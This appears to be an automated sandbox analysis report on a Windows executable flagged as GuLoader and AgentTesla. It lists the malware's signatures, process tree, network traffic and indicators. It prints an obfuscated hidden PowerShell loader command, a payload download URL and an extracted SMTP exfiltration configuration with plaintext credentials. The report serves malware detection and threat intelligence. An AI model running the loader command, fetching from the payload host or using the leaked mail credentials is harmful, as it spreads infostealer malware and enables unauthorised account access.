Edit tour

Windows Analysis Report
hnTW5HdWvY.exe

Overview

General Information

Sample name:	hnTW5HdWvY.exe renamed because original name is a hash value
Original sample name:	6827f81b3add0570684d911484c7c3a75f4d565123261d4173306ab35e998494.exe
Analysis ID:	1420850
MD5:	d32a9f003d7d44f7839d1e73ab0880dc
SHA1:	600da56efcbe1f1ecfbf984b6f7f1103e067e43d
SHA256:	6827f81b3add0570684d911484c7c3a75f4d565123261d4173306ab35e998494
Tags:	exe
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

Check if machine is in data center or colocation facility

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Obfuscated command line found

Powershell drops PE file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Potential Dosfuscation Activity

Sigma detected: Suspicious Outbound SMTP Connections

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

hnTW5HdWvY.exe (PID: 6748 cmdline: "C:\Users\user\Desktop\hnTW5HdWvY.exe" MD5: D32A9F003D7D44F7839D1E73AB0880DC)

powershell.exe (PID: 4320 cmdline: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7220 cmdline: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

wab.exe (PID: 7456 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.legodimo.co.za", "Username": "info@legodimo.co.za", "Password": "IFfo%142#"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2869316085.00000000205A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.2018427169.0000000008E2F000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: wab.exe PID: 7456	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: wab.exe PID: 7456	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4320, TargetFilename: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe

Sigma detected: Potential Dosfuscation Activity

Source: Process started

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4320, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" /c "set /A 1^^0", ProcessId: 7220, ProcessName: cmd.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 41.76.215.87, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Program Files (x86)\Windows Mail\wab.exe, Initiated: true, ProcessId: 7456, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", CommandLine: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hnTW5HdWvY.exe", ParentImage: C:\Users\user\Desktop\hnTW5HdWvY.exe, ParentProcessId: 6748, ParentProcessName: hnTW5HdWvY.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Apologi133=Get-Content 'C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Bundforskelligt.For';$Equestrial=$Apologi133.SubString(19094,3);.$Equestrial($Apologi133)", ProcessId: 4320, ProcessName: powershell.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: hnTW5HdWvY.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png	URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe

Avira: detection malicious, Label: HEUR/AGEN.1338492

Found malware configuration

Source: conhost.exe.3004.2.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.legodimo.co.za", "Username": "info@legodimo.co.za", "Password": "IFfo%142#"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe	ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe	Virustotal: Detection: 60%			Perma Link

Multi AV Scanner detection for submitted file

Source: hnTW5HdWvY.exe	ReversingLabs: Detection: 50%
Source: hnTW5HdWvY.exe	Virustotal: Detection: 50%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: hnTW5HdWvY.exe

Joe Sandbox ML: detected

Source: hnTW5HdWvY.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 102.67.137.82:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49737 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbC:4 source: powershell.exe, 00000001.00000002.2010532480.0000000002B40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2017911817.00000000081B4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000001.00000002.2017782713.0000000008175000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2015644677.000000000726A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbS source: powershell.exe, 00000001.00000002.2010532480.0000000002B40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000001.00000002.2015644677.00000000071CB000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Code function: 0_2_00402647 FindFirstFileA,	0_2_00402647
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Code function: 0_2_00405E7E FindFirstFileA,FindClose,	0_2_00405E7E
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Code function: 0_2_0040543A GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_0040543A

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.4:49739 -> 41.76.215.87:587

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 102.67.137.82 102.67.137.82
Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com

Source: global traffic

TCP traffic: 192.168.2.4:49739 -> 41.76.215.87:587

Source: global traffic	HTTP traffic detected: GET /dKatzZJXqh143.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: lifeartfertility.co.zaCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /dKatzZJXqh143.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: lifeartfertility.co.zaCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: lifeartfertility.co.za

Source: powershell.exe, 00000001.00000002.2010532480.0000000002B40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: wab.exe, 00000005.00000002.2869316085.0000000020591000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: wab.exe, 00000005.00000002.2869316085.0000000020591000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: wab.exe, 00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2869316085.00000000205E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://legodimo.co.za
Source: wab.exe, 00000005.00000002.2869316085.00000000205CD000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2869316085.00000000205E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.legodimo.co.za
Source: hnTW5HdWvY.exe, hnTW5HdWvY.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: hnTW5HdWvY.exe, hnTW5HdWvY.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2011308617.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2011308617.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2869316085.0000000020541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2011308617.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.0000000007210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2011308617.0000000004A01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBqq
Source: wab.exe, 00000005.00000002.2869316085.0000000020541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: wab.exe, 00000005.00000002.2869316085.0000000020541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: wab.exe, 00000005.00000002.2869316085.0000000020541000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2011308617.0000000004B56000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.00000000071A6000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2015644677.0000000007210000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: wab.exe, 00000005.00000002.2857526156.0000000000B58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lifeartfertility.co.za/
Source: wab.exe, 00000005.00000002.2857936435.0000000000E90000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000005.00000002.2857526156.0000000000B58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lifeartfertility.co.za/dKatzZJXqh143.bin
Source: wab.exe, 00000005.00000002.2857526156.0000000000B58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lifeartfertility.co.za/dKatzZJXqh143.bind
Source: wab.exe, 00000005.00000002.2857526156.0000000000B58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lifeartfertility.co.za/o
Source: powershell.exe, 00000001.00000002.2013851591.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 102.67.137.82:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49737 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe

Jump to behavior

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

Code function: 0_2_00404FA3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404FA3

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs\hnTW5HdWvY.exe

Jump to dropped file

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe

Code function: 0_2_004030CB EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_004030CB

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File created: C:\Windows\resources\0809	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File created: C:\Windows\oprykningens	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	File created: C:\Windows\oprykningens\Patriciates	Jump to behavior

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Code function: 0_2_004047E2	0_2_004047E2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0489F4F8	1_2_0489F4F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0489EDB0	1_2_0489EDB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_00A7B7B0	5_2_00A7B7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_00A74AC0	5_2_00A74AC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_00A7EB60	5_2_00A7EB60
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_00A73EA8	5_2_00A73EA8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_00A7EF10	5_2_00A7EF10
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_00A741F0	5_2_00A741F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_233C2794	5_2_233C2794
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_233C39B0	5_2_233C39B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_233C2CE0	5_2_233C2CE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_233C2CD3	5_2_233C2CD3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_233C39DB	5_2_233C39DB
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_233D6228	5_2_233D6228
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_233DB259	5_2_233DB259
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_233D51E0	5_2_233D51E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_233D30A0	5_2_233D30A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_233D2379	5_2_233D2379
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_233DE3E8	5_2_233DE3E8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_233D72E0	5_2_233D72E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 5_2_233D590F	5_2_233D590F

Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: fontext.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: fms.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\hnTW5HdWvY.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
